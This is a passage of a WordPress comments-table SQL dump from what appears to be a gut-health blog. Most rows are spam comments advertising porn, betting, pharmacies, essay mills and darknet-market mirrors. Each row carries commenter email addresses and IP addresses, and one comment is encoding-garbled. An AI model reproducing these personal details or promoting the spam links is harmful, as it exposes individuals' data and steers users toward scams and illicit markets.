news. Mckinley Mejias',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6636,5410,'watch series','ksaavdr@santander.cl','https://jetfilmizle.eu/','51.159.36.102','2022-07-11 01:39:42','2022-07-11 01:39:42','Excellent post. I will be dealing with some of these issues as well.. Rosario Nunley',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6637,5410,'bahis oyna','nonitacisne@hotmail.com','https://jetfilmizle.eu/','51.159.37.117','2022-07-11 07:17:11','2022-07-11 07:17:11','This is a very good tip particularly to those new to the blogosphere. Neil Showalter',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6639,4659,'ivstonedekor.ru','conradbeggs@gmail.com','http://ivstonedekor.ru/index.php/component/k2/itemlist/user/434372','154.194.8.223','2022-07-12 11:18:22','2022-07-12 11:18:22','Heya i am for the first time here. I found this board and I to find It \r\ntruly useful & it helped me out much. I hopoe tto provide one thing bac and help others like you aided me.\r\n\r\n\r\nmy webb site: ivstonedekor.ru',0,'0','Mozilla/5.0 (MSIE 9.0; qdesk 2.4.1266.203; Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','comment',0,0),(6650,5410,'porno izle','andreajimena_4@hotmail.com','https://fullfilmcidayim.com/','51.159.37.26','2022-07-16 18:03:35','2022-07-16 18:03:35','Just testing. Will it get any better ? same bat time same bat channel. Carmelo Haward',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6651,5410,'porno','cecy.olivares.m@gmail.com','https://fullfilmcidayim.com/','51.159.37.31','2022-07-16 23:35:33','2022-07-16 23:35:33','Loving the information on this site, you have done great job on the blog posts. Francisco Rava',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6655,5410,'porno','gloriaparedes9@gmail.com','https://fullfilmcidayim.com/','51.159.37.178','2022-07-18 03:36:16','2022-07-18 03:36:16','Every weekend i used to visit this website, because i wish for enjoyment, since this this web site conations in fact fastidious funny data too. Luke Hoese',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6657,5410,'sikis','gutierrezximena1@gmail.com','https://fullfilmcidayim.com/','51.159.36.102','2022-07-18 09:14:03','2022-07-18 09:14:03','I believe this web site contains some really fantastic info for everyone : D. Robt Mourino',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6659,5410,'porno izle','miguel.diaz.fuentes@gmail.com','https://fullfilmcidayim.com/','51.159.37.178','2022-07-18 16:28:08','2022-07-18 16:28:08','You made a number of nice points there. I did a search on the matter and found the majority of persons will go along with with your blog. Merlin Leady',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6662,5410,'bahis oyna','j.lopez.zamorano@hotmail.com','https://fullfilmcidayim.com/','51.159.37.33','2022-07-19 06:13:43','2022-07-19 06:13:43','Only wanna remark that you have a very decent site, I enjoy the pattern it actually stands out. Santos Cross',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6671,5410,'anime','solsita27@gmail.com','https://fullfilmcidayim.com/','51.159.37.31','2022-07-20 06:58:18','2022-07-20 06:58:18','Really appreciate you sharing this article post. Really looking forward to read more. Fantastic. Carlo Flamino',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(6703,2132,'ayawigatihon','ufabujeor@egiuz.fodiscomail.com','http://slkjfdf.net/','54.39.18.217','2022-07-26 22:40:25','2022-07-26 22:40:25','http://slkjfdf.net/ - Ozigaevu Usemdkoji dtf.hkis.tummyrevolution.com.fcm.ov http://slkjfdf.net/',0,'spam','Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','comment',0,0),(6704,2132,'ezixefoququ','ojuwiybuf@egiuz.fodiscomail.com','http://slkjfdf.net/','54.39.18.217','2022-07-26 22:58:30','2022-07-26 22:58:30','http://slkjfdf.net/ - Ipaxeju Emeerocp ukb.snqk.tummyrevolution.com.gru.hh http://slkjfdf.net/',0,'spam','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46','comment',0,0),(10420,5586,'A Comprehensive Guide to Digestive Problems During Menopause – Tummy Revolution','','https://tummyrevolution.com/a-comprehensive-guide-to-digestive-problems-during-menopause/','68.65.120.177','2023-10-10 14:18:51','2023-10-10 14:18:51','[…] problems during menopause are not uncommon, but understanding the causes and seeking appropriate treatment can help alleviate discomfort and improve overall […]',0,'0','The Incutio XML-RPC PHP Library -- WordPress/6.3.1','pingback',0,0),(10421,5472,'What does Bone Broth do to your Body – Tummy Revolution','','https://tummyrevolution.com/what-does-bone-broth-do-to-your-body/','68.65.120.177','2023-10-12 05:40:03','2023-10-12 05:40:03','[…] HERE for a Chicken and Beef Bone Broth recipe OR You can buy these Bone Broths online by following the […]',0,'0','The Incutio XML-RPC PHP Library -- WordPress/6.3.1','pingback',0,0),(10395,5435,'BestFarmlulty','iunskiygipertonik@gmail.com','https://pharmacy-discount.com/category/Erectile-Dysfunction?aff=1185','185.190.42.200','2023-08-22 14:02:25','2023-08-22 14:02:25','asthma what-you-must-know \r\nhow to prevent asthma in children \r\nventolin-inhaler-where-to-get-it \r\n \r\nhttps://writeablog.net/flowers63mcgregor/the-results-of-ventolin-inhaler\r\nhttps://squareblogs.net/mcgregor37upchurch/asthma-what-its-essential-to-know\r\nhttps://postheaven.net/damm23damm/asthma-what-you-must-know\r\nhttps://postheaven.net/damm23damm/how-to-prevent-asthma-in-children\r\nhttps://telegra.ph/Ventolin-Inhaler--Where-To-Get-It-08-22',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5042.0 Safari/537.36','comment',0,0),(10396,5435,'DavidPneum','74kx69gw5jnwynw@rambler.ru','https://pharmsky.space/','193.68.73.52','2023-08-22 16:33:53','2023-08-22 16:33:53','erostone - fungoxil, mizonil купить в германии',0,'spam','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36','comment',0,0),(10397,5435,'HerbertAccus','h9714715@gmail.com','https://goo.su/yzBrg06','95.158.43.34','2023-08-22 18:21:19','2023-08-22 18:21:19','Watch top mature sex videos for free on our mature tube',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36','comment',0,0),(10398,5435,'Lonniejup','jz552qujipav0qq@rambler.ru','https://softsky.store/','138.199.31.18','2023-08-22 18:22:43','2023-08-22 18:22:43','idealica ecuador - biolica precio, matcha suri donde comprar',0,'spam','Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36','comment',0,0),(10399,5435,'Scottbip','cqurys@outlook.com','','178.168.195.63','2023-08-22 19:49:40','2023-08-22 19:49:40','Перед испытанием гидротестер РїСЂРё помощи соединительной головки крепят Рє пожарному крану. Затем ствол СЃРѕ сменным соплом направляют РІ пустой резервуар. Открывают РѕСЃРЅРѕРІРЅРѕР№, Р° затем шаровой кран РЅР° гидротестере. Манометром проверяют давление РІРѕРґС‹ Рё сравнивают полученный расход СЃ нормативной таблицей.\r\nР’ случае применения аппаратных методов обеззараживания медицинских отходов РІ организации допускается СЃР±РѕСЂ медицинских отходов класса Р‘ РЅР° рабочих местах этой организации РІ общие емкости (контейнеры, пакеты) использованных шприцев РІ неразобранном РІРёРґРµ СЃ предварительным отделением РёРіР», перчаток, перевязочного материала. Для отделения РёРіР» должны использоваться иглосъемники, иглодеструкторы, иглоотсекатели.\r\nСтандарт размещения Рё комплектности внутреннего РџРљ.\r\nОтключить изделие РѕС‚ РІРѕРґРѕРїСЂРѕРІРѕРґР°; Открутить накидным или рожковым ключом удерживающие фланец болты;\r\nБайпас — отрезок трубы между подающим Рё обратным трубопроводом, РѕР±С…РѕРґРЅРѕР№ путь РїРѕРјРёРјРѕ радиатора. РћРЅРё оснащаются клапанами или кранами Рё позволяют регулировать температуру РІ помещении или совсем отключить отдельно взятую батарею.\r\n \r\nБольше информации можно найти на странице https://telegra.ph/Sovremennye-Podhody-k-Montazhu-Sistem-Otopleniya-s-Prinuditelnoj-Cirkulyaciej-Teplonositelya-08-15 \r\n \r\nЧасть избыточного ила РёРЅРѕРіРґР° направляют РІ первичные отстойники СЃ целью интенсифицировать процессы отстаивания. Рекомендуется передавать РІ первичные отстойники РґРѕ 50% прироста ила. Расход РІРѕР·РґСѓС…Р° РЅР° перемешивание РІРѕРґС‹ Рё ила составляет величину РїРѕСЂСЏРґРєР° 0,5 Рј3/Рј3, продолжительность контакта РІ преаэ - раторах — РѕС‚ 10 РґРѕ 20 РјРёРЅ Рё РІ биокоагуляторах — 20 РјРёРЅ. Дополнительный эффект осветления РїРѕ взвешенным веществам Рё БПКполн РІ РѕР±РѕРёС… случаях составляет 10—15%. Если указанные приемы использованы РІ эксплуатации, то РїСЂРё характеристике работы отстойников обязательно принимается РІРѕ внимание изменение состава РІРѕРґС‹ после смешения ее СЃ избыточным илом.\r\n1. Самостоятельный Р’РџР’ — выполняет РѕСЃРЅРѕРІРЅСѓСЋ функцию Рё РЅРµ имеет гидравлической СЃРІСЏР·Рё СЃ РґСЂСѓРіРёРјРё водопроводами здания.\r\nУстановка бетонного фундамента.\r\nБольшинство изделий для канализационных систем изготавливаются РёР· прочного Рё доступного РїРѕ цене РџРќР”. Для выбора конкретного варианта необходимо определится СЃ такими параметрами, как:\r\nЗаключение.',0,'spam','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36','comment',0,0),(10400,5435,'MichaelMub','info@24avant.ru','http://[url=24avant.ru]24avant.ru[/url%5D','136.169.174.39','2023-08-22 21:27:20','2023-08-22 21:27:20','Укладка теплого пола \r\nhttps://24avant.ru \r\nhttp://cse.google.ad/url?q=http://24avant.ru/',0,'spam','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36','comment',0,0),(10401,5435,'AngelGog','u4hgba2hr16uvvn@rambler.ru','https://vk5at.top','213.21.215.165','2023-08-22 23:48:14','2023-08-22 23:48:14','vk4at - vk10at, кракен зеркало',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11','comment',0,0),(10402,5435,'Scottbip','cqurys@outlook.com','','178.168.195.63','2023-08-22 23:48:37','2023-08-22 23:48:37','Личные финансы и семейный бюджет.\r\nОсобенно хорошо подготовились с крупными релизами в этом году Activision Blizzard Inc (ATVI) и Take-Two Interactive Software Inc (TTWO). Так, у ATVI выйдут долгожданные «Call of Duty: Black Ops 4,» “World of Warcraft” и “Destiny”, а у TTWO — “Red Dead Redemption 2”.\r\nЭти операции банка можно отнести к игре на бирже или, другими словами, спекуляции.\r\nВ среду представители Ebay объявили об отказе использования платежной системы PayPal и замены ее стартапом Adyen BV, акции PayPal упали на 10 процентов. подробнее>>\r\nОАЭ вложат 600 миллионов долларов в ветровые электростанции Узбекистана.\r\n \r\nБольше инормации можно найти о банковском секторе можно найти в статье https://telegra.ph/Preodolenie-Finansovyh-Barerov-Kak-Poluchit-Kredit-na-Otkrytie-Malogo-Biznesa-08-15 \r\n \r\nКак выгодно для себя использовать банковские продукты?\r\nВ зависимости от способа выплаты доходов можно выделить ценные бумаги с фиксированным доходом и ценные бумаги с плавающим доходом.\r\nКроме того, по данным Statista, индустрия видеоигр только в США в текущем году оценивается в $19 млн, что на $5 млн выше показателя 2012 года. Ожидается, что к 2020 году может быть преодолён порог и в $20 млн.\r\nОднако большие инвестиционные отделы и квалифицированные кадры имеют только крупные банки, у которых инвестиционные операции занимают большой удельный вес в общем объеме активных операций.\r\nПри нарушении показателей ликвидности в результате изменений на рынке ценных бумаг банк может решить эту проблему не только путем продажи части первичного резерва, но и другими способами: погашением ссуд до востребования, привлечением депозитов, уменьшением объемов кредитования и т.д. Это объясняется тем, что в результате продажи ценных бумаг первичного резерва банк в этой ситуации может понести большие потери, чем по другим направлениям.',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36','comment',0,0),(10403,5435,'JamesTrito','zc6gvcdeyi1bc6c@rambler.ru','https://ebittechnologyx.com/','172.111.150.20','2023-08-23 00:37:51','2023-08-23 00:37:51','the original source eBit Technologyx',0,'spam','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36','comment',0,0),(10404,5435,'ПечатиЧелябинск','stm618@mail.ru','http://печати-в-челябинске.рф','91.232.110.64','2023-08-23 02:54:39','2023-08-23 02:54:39','Изготовление печатей и еще штампов в течение короткие сроки \r\nпечати-в-челябинске.рф для ради нашем сайте печати-в-челябинске.рф \r\n \r\nhttps://печативкраснодаре.рф] \r\n \r\n \r\nhttp://печати-в-челябинске.рф] \r\n \r\n \r\nhttps://alfa-pechati.ru]',0,'spam','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36','comment',0,0),(10405,5435,'EdwardHib','ru5ngqojfob9f6j@rambler.ru','https://mega-s.sbs','154.47.27.97','2023-08-23 04:39:50','2023-08-23 04:39:50','mega onion ссылка - как зайти на сайт мега, mega dm',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36','comment',0,0),(10406,5435,'Darrellloulp','hi0n9ul95ps7hs9@rambler.ru','https://go.krkn.top','154.47.27.97','2023-08-23 06:51:48','2023-08-23 06:51:48','кракен сайт - рабочее зеркало kraken, кракен даркнет сайт',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36','comment',0,0),(10407,5435,'Scottbip','cqurys@outlook.com','','178.168.195.63','2023-08-23 06:57:26','2023-08-23 06:57:26','Основным показателем при определении доходности тех или иных ценных бумаг является ставка дивиденда (процента) компании, которая определяется путем отношения чистой прибыли акционерного общества, идущей на выплату доходов по ценным бумагам, к уставному фонду этого акционерного общества (в процентах). После этого ставка дивиденда сопоставляется со средней процентной ставкой по долгосрочным вкладам населения и депозитам предприятий. Если отношение этих двух показателей меньше единицы, то доходность таких ценных бумаг будет недостаточной и приведет к оттоку инвесторов.\r\nНедостатком этого метода можно назвать возможность недостоверности прогнозов по процентным ставкам. Однако при наличии точных прогнозов этот метод является более эффективным, чем метод ступенчатой структуры.\r\nАдминистрация Худжанда активно ищет инвесторов для постройки ТЭЦ.\r\nИнвестиционными операциями банков являются вложения свободных денежных средств в ценные бумаги различных эмитентов на относительно длительный период времени.\r\nОсновными сферами вложений инвестиционных фондов и компаний являются торгово-посредническая деятельность и операции на рынке ценных бумаг. В будущем предполагается рост вложений инвестиционными компаниями и фондами в недвижимость, разработку высоких технологий, освоение месторождений полезных ископаемых и т.д.\r\n \r\nБольше инормации можно найти о банковском секторе можно найти в статье https://telegra.ph/Preodolenie-Finansovyh-Barerov-Kak-Poluchit-Kredit-na-Otkrytie-Malogo-Biznesa-08-15 \r\n \r\nВ зависимости от этих принципов можно также классифицировать портфели ценных бумаг. Если инвестор главной целью ставит максимальное получение дохода, то он формирует портфель из низколиквидных ценных бумаг с высоким риском и, наоборот, при стремлении инвестора обеспечить сохранность своего капитала в портфель будут включены ценные бумаги известных эмитентов с высокой ликвидностью, но гарантирующие, как правило, средний или низкий дивиденд.\r\nИнвестиционный фонд, его управляющий и банк-депозитарий взаимозависят друг от друга и осуществляют контроль над деятельностью каждого из них.\r\nСекторы, которые интересны private equity funds, — это розница, финансовые организации, небольшие банки, и, наверное, все то, что связано с товарами народного потребления — супермаркеты, аптечные сети. «Business to business» не так интересен сам по себе. В стратегические секторы — нефть, газ, металлы — private equity funds зайти не могут, поскольку там много крупных национальных и иностранных компаний. Так что, если и говорить о секторах, где ФПИ могли бы работать, то это розница.\r\nИнвестиционный холдинг из ОАЭ осуществит масштабное финансирование в энергетическую отрасль Узбекистана.\r\nНа рынке ценных бумаг Украины, как правило, обращаются не сами ценные бумаги, а их заменители - сертификаты, часто выдаваемые акционерам на общую сумму купленных акций. Информация о рентабельности и надежности вновь созданных акционерных обществ чаще всего отсутствует. Все это говорит о непривлекательности фондового рынка Украины для потенциальных инвесторов.',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11','comment',0,0),(10408,5435,'PeterNib','zolh2kxp6nu1s9p@rambler.ru','https://ebittechnologyx.com/','172.111.150.20','2023-08-23 08:24:35','2023-08-23 08:24:35','YOURURL.com \r\nCompany NewYork eBit Technology',0,'spam','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36','comment',0,0),(10419,5586,'Nurse Your Gut Health After Menopause: Essential Strategies – Tummy Revolution','','https://tummyrevolution.com/nurse-your-gut-health-after-menopause-essential-strategies/','68.65.120.177','2023-10-10 06:11:28','2023-10-10 06:11:28','[…] LINK TO THE RECOMMENDED BEST PROBIOTICS TO SUPPORT YOUR GUT HEALTH AFTER MENOPAUSE […]',0,'1','The Incutio XML-RPC PHP Library -- WordPress/6.3.1','pingback',0,0),(10410,5435,'Robertbak','fevgen708@gmail.com','','194.88.152.40','2023-08-23 09:44:10','2023-08-23 09:44:10',' Waterproof Bracelet. Buy 2 bracelets, get the 3rd for FREE. The best gifts for men',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36','comment',0,0),(10411,5435,'Hectorreedo','hectorZooWl@gseomail.com','https://dissertationwritingtops.com','37.139.53.13','2023-08-23 10:50:30','2023-08-23 10:50:30','Info effectively used!! \r\nfirst writing service reviews term paper writing services cheap term paper writing service writing a research paper proposal i need help writing my research paper essay writing service news dissertation writing uk define dissertation dissertation writing service dissertation proposal',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OpenWave/97.4.2043.44','comment',0,0),(10412,5435,'Scottbip','cqurys@outlook.com','','178.168.207.229','2023-08-23 13:19:58','2023-08-23 13:19:58','Инвестор с небольшим инвестиционным капиталом не в состоянии предотвратить неожиданные колебания дохода и всевозможные потрясения, так как не сможет самостоятельно провести диверсификацию вложенных средств.\r\nЕще одной проблемой развития ФПИ является нехватка квалифицированных местных кадров, которые могли бы обеспечить рост этого рынка. «Казахстан — молодая страна в плане управленческого опыта. Поэтому не нужно терять свои таланты, которые уходят за границу. Необходимо привлекать их обратно», — говорит он.\r\nAmazon и Apple не платят налоги в Европе.\r\nФиксированный портфель представляет собой совокупность ценных бумаг, которые остаются на весь период существования портфеля в неизменном состоянии. Как правило, такие портфели представлены государственными ценными бумагами. Последняя дата погашения по этим облигациям определяет срок существования всего портфеля. Фиксированный портфель гарантирует инвестору высокую безопасность, но не дает больших доходов.\r\nКулагин: постройка ГЭС у Таджикистана и Узбекистана займет минимум пару лет.\r\n \r\nБольше инормации можно найти о банковском секторе можно найти в статье https://telegra.ph/Preodolenie-Finansovyh-Barerov-Kak-Poluchit-Kredit-na-Otkrytie-Malogo-Biznesa-08-15 \r\n \r\nЗа первые три месяца 2020-го в Таджикистане только по объектам производственного назначения было освоено инвестиций на сумму более 1,6 миллиарда сомони.\r\nНа первом месте, в соответствии со спросом инвесторов, стоят акции украинских и российских эмитентов и первые коммерческие и государственные облигации.\r\nИзучаете, куда вложить финансы? Размышляете привлечь инвестиции или продать действующий бизнес? Разместите информацию в объявлениях на сайте, и Ваш проект наверняка вызовет интерес аудитории.\r\nОрганизация экономического сотрудничества и развития продолжает активную борьбу с льготными режимами.\r\nВторичный рынок с точки зрения его организации подразделяется, в свою очередь, на централизованный и децентрализованный.',0,'spam','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36','comment',0,0),(10413,5435,'Hectorreedo','hectorZooWl@eseomail.com','https://essayservicehelp.com','37.139.53.13','2023-08-23 13:24:38','2023-08-23 13:24:38','Appreciate it, Ample material! \r\nhow do i find a good resume writing service parts of a research proposal write term papers for money phd proposal proposal write the basics of essay writing essays for sale buy an essay online reviews buy an essay online buy an essay online reviews',0,'spam','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36','comment',0,0),(10414,5435,'WilmanAmozy','fxhftvgsjet@bobbor.store','','45.86.200.46','2023-08-23 18:20:58','2023-08-23 18:20:58','Заказать металлочерепицу - только в нашем магазине вы найдете приемлемые цены. Быстрей всего сделать заказ на стоимость металлочерепицы можно только у нас! \r\nцена металлочерепицы минск \r\nметаллочерепица для крыши - https://www.metallocherepica24.by/ \r\nhttp://ccasayourworld.com/?URL=metallocherepica24.by \r\n \r\nМеталлочерепица минск цены - при выборе наиболее лучшего варианта металлочерепицы необходимо учитывать все преимущества и недостатки, а также анализировать погодные условия местности, где вы живете, качество продуктов, ее стоимость и технические характеристики. 5_35a71',0,'spam','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36','comment',0,0),(10415,5435,'HowardDah','marketing@maltanewstime.com','https://www.scotlandnewstoday.com/','63.141.239.114','2023-08-23 19:51:31','2023-08-23 19:51:31','Top News Sites where i can provide guest post \r\nHere is list : \r\nhttps://www.irishnewstoday.com/ \r\nhttps://www.chinaworldnewstoday.com/ \r\nhttps://www.crunchbasenewstoday.com/ \r\nhttps://www.topeuropenews.com/ \r\nhttps://www.dailyexpressnewstoday.com/ \r\nhttps://www.thesunnewstoday.com/ \r\nhttps://www.huffingtonposttoday.com/ \r\nhttps://www.nationalposttoday.com/ \r\nhttps://www.scotlandnewstoday.com/ \r\nhttps://www.maltanewstime.com \r\nhttps://www.mirrornewstoday.com/ \r\nhttps://www.timesofspanish.com \r\nhttps://www.italiannewstoday.com/ \r\nhttps://www.turkeynewstoday.com/ \r\nhttps://www.walesnewstoday.com/ \r\nhttps://www.washingtonposttoday.com/ \r\nhttps://www.thestarnewstoday.com \r\nhttps://www.theindependentnewstoday.com/ \r\nhttps://www.chroniclenewstoday.com',0,'spam','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36','comment',0,0),(10416,5435,'AlinaAnorp','alina@posti8.site','https://cvety-v-nn.store','94.103.80.181','2023-08-24 00:13:14','2023-08-24 00:13:14','Приветствую всех! \r\n \r\nС радостью поделюсь уникальным опытом, как мне удачно удалось организовать незабываемый сюрприз для мамы в честь её дня рождения, несмотря на значительное расстояние, \r\nразделяющее нас. Моя мама живет в Нижнем Новгороде, а я нахожусь в Владивостоке, на другом конце страны. \r\nС самого начала я столкнулась с дилеммой: как обеспечить доставку цветов так, чтобы они долетели до неё вовремя и в идеальном состоянии. \r\nСпасибо интернету, я обнаружила прекрасный онлайн-сервис https://cvety-v-nn.store, который занимается доставкой цветов в Нижний Новгород. \r\nСотрудники этого сервиса оказались исключительно отзывчивыми и помогли мне подобрать идеальный букет. \r\nПосле беседы с оператором, я почувствовала уверенность в своем выборе. \r\nЧрезвычайно приятно, что курьер доставил букет маме вовремя и в прекрасном состоянии, добавляя в сюрприз ещё больше радости. \r\nМама была настолько счастлива, что это превзошло все её ожидания. \r\nС полной уверенностью я рекомендую этот великолепный сервис всем, кто желает подарить радость и улыбку своим близким, несмотря на расстояние. \r\nЖелаю всем вам удачи в создании самых прекрасных моментов в жизни ваших родных! \r\n \r\nБукеты срочно Нижний Новгород\r\nБукет из тюльпанов Нижний Новгород\r\nЦветочный магазин в Нижнем Новгороде\r\nДоставка цветов в Нижний Новгород онлайн\r\nДоставка цветов в Нижний Новгород',0,'spam','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36','comment',0,0),(10417,5435,'Scottbip','cqurys@outlook.com','','178.168.194.199','2023-08-24 06:22:07','2023-08-24 06:22:07','За первые два месяца 2020 года в Таджикистане было использовано почти 15 миллионов долларов инвестиций в основной капитал.\r\nКак известно, прямые инвестиции — наиболее гибкий вид финансирования развития бизнеса, доступный тогда, когда остальные источники не могут быть использованы. Сотрудничество фонда с компаниями может строиться различным путем: фонды могут выступать как отстраненными финансовыми инвесторами, так и участниками бизнеса, активно вмешиваясь в операционную деятельность. Private equity фонды, как правило, выходят из проектов в течение лет, получая в этот период доходность на уровне % годовых. По оценке экспертов, прямые инвестиции — сравнительно дорогой вид инвестиций, которые накладывают дополнительные обязательства на компанию. Например, фонды снижают риски, подписывая соглашения, противостоящие размыванию капитала, получают право на информацию, право первого выхода из проекта, вето на крупные транзакции.\r\nВ странах с развитой рыночной экономикой инвестиционные компании вкладывают средства своих акционеров в различные инвестиционные проекты, в основном, путем приобретения акций различных эмитентов. В Украине пока незначительная часть предприятий является акционерными обществами, поэтому инвестиционные компании осуществляют, в основном, реальные инвестиции, что является менее эффективным, так как существует сложность оперативного управления такими вложениями.\r\nДоход, получаемый коммерческим банком от инвестиционных операций, зависит от многих факторов: стабильности экономики, совершенства законов, регулирующих инвестиционную деятельность, отлаженной финансово-кредитной системы, наличия развитого фондового рынка и квалифицированных финансовых посредников на нем.\r\nКак грамотно пользоваться кредитами? Все о рынке банковских услуг.\r\n \r\nБольше инормации можно найти о банковском секторе можно найти в статье https://telegra.ph/Preodolenie-Finansovyh-Barerov-Kak-Poluchit-Kredit-na-Otkrytie-Malogo-Biznesa-08-15 \r\n \r\nИнвестиции.\r\nСледующей целью инвестора при выборе ценных бумаг является безопасность вложений. Безопасность - это способность эмитента взять ответственность перед инвестором за привлеченные средства и обеспечить их защиту от всевозможных потрясений. Защиту инвестора осуществляет государство с помощью законодательной базы. Так, например, законами Украины запрещен выпуск ценных бумаг для покрытия убытков от хозяйственной деятельности акционерного общества.\r\nВ нашей стране процесс инвестирования имеет свою специфику.\r\nТак, завод ООО \"ПСМА Рус\" (совместное предприятие PSA Peugeot Citroen и Mitsubishi) в Калуге прекратит выпуск автомобилей марок Peugeot, Citroen и Opel с 1 по 10 апреля. Предприятие с 1 по 5 апреля уйдет в простой, с 6 по 10 апреля на заводе запланирован коллективный отпуск.\r\nУчастниками рынка ценных бумаг являются эмитенты ценных бумаг, инвесторы и инвестиционные институты.',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36','comment',0,0),(10418,5435,'Hectorreedo','hectorZooWl@gseomail.com','https://studentessaywriting.com','37.139.53.13','2023-08-24 09:22:02','2023-08-24 09:22:02','Amazing data. Kudos. \r\ncheap college essay writing service what should i write my argumentative essay on someone do my essay i can t do my essay write my research essay top quality essay writing services college essay writer i don t want to write my essay hire essay writer australia writing college essays',0,'spam','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36','comment',0,0),(10422,5574,'Puravive Reviews','treva_alias@hotmail.com','https://www.healthmassive.com/','103.115.198.103','2024-01-08 04:28:51','2024-01-08 04:28:51','I loved you better than you would ever be able to express here. The picture is beautiful, and your wording is elegant; nonetheless, you read it in a short amount of time. I believe that you ought to give it another shot in the near future. If you make sure that this trek is safe, I will most likely try to do that again and again.',0,'0','','comment',0,0),(10423,5519,'Puravive Reviews','treva_alias@hotmail.com','https://www.healthmassive.com/','103.115.198.103','2024-01-08 04:29:07','2024-01-08 04:29:07','I loved you better than you would ever be able to express here. The picture is beautiful, and your wording is elegant; nonetheless, you read it in a short amount of time. I believe that you ought to give it another shot in the near future. If you make sure that this trek is safe, I will most likely try to do that again and again.',0,'0','','comment',0,0),(10424,5679,'Puravive Reviews','treva_alias@hotmail.com','https://www.healthmassive.com/','103.115.198.103','2024-01-08 04:29:22','2024-01-08 04:29:22','I loved you better than you would ever be able to express here. The picture is beautiful, and your wording is elegant; 